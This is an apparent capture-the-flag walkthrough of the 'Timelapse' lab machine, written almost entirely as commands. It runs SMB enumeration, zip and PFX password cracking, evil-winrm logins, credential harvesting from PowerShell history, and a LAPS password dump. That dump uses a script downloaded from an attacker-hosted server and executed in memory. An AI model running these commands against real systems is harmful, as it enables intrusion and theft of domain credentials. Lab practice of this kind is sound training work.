Timelapse
Hola, esta es la máquina timelapse! Let’s hack!
RECON
ping -c 1 <IP>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
extractports <ports>
nmap -sCV <PORTS> -oG services
AD DOMAIN DETECTION
crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP> <DOMAIN>
SMB ENUM
smbclient -L <IP> -N
crackmapexec smb <IP> --shares
smbmap -H <IP> -u 'null'
SMB ENUM MACHINE
smbclient //<IP>/Shares -N
cd Dev
get <Archivo.zip>
DECRYPT FILE PASSWORD
unzip <Archivo.zip>
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt <Archivo.zip>
unzip <Archivo.zip>
TRYING TO OPEN PFX FILE
openssl pkcs12 -in <Archivo.pfx> -nocerts -out priv-key.pem -nodes
FINDING PFX FILE PASSWORD (PFX2JOHN)
python3 pfx2john.py <Archivo.pfx>
FINDING PFX FILE PASSWORD (CRACKPKCS12)
apt install libssl-dev
git clone https://github.com/crackpkcs12/crackpkcs12
cd crackpkcs12
./configure
make
make install
crackpkcs12 -d /usr/share/wordlists/rockyou.txt <Archivo.pfx>
OPENING PFX FILE
openssl pkcs12 -in <Archivo.pfx> -nocerts -out priv-key.pem -nodes
ls
openssl pkcs12 -in <Archivo.pfx> -nokeys -out certificate.pem
cat certificate.pem
GRANTED ACCESS LEGACYY USER
evil-winrm -i <IP> -c certificate.pem -k priv-key.pem -S
whoami
FLAG USER.TXT
cd ..
cd Desktop
cat user.txt
AD ENUM LOCAL
net user
whoami /priv
net user legacyy
net user svc_deploy
type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
GRANTED ACCESS SVC_DEPLOY USER
crackmapexec smb <IP> -u 'svc_deploy' -p '<PASSWORD>'
evil-winrm -i <IP> -u 'svc_deploy' -p '<PASSWORD>' -S
whoami
SHARING GET-LAPSPASSWORDS.PS1
# MÁQUINA ATACANTE
git clone https://github.com/kfosaaen/Get-LAPSPasswords
cd Get-LAPSPasswords
python3 -m http.server 80
# MÁQUINA VÍCTIMA
IEX(New.Object Net.WebClient).downloadString('http://<IP_ATACANTE>/Get-LAPSPasswords.ps1')
Get-LAPSPasswords
GRANTED ACCESS ADMINISTRATOR USER
crackmapexec smb <IP> -u 'Administrator' -p '<PASSWORD>'
evil-winrm -i <IP> -u 'Administrator' -p '<PASSWORD>' -S
whoami
FLAG ROOT.TXT
type C:\users\TRX\Desktop\root.txt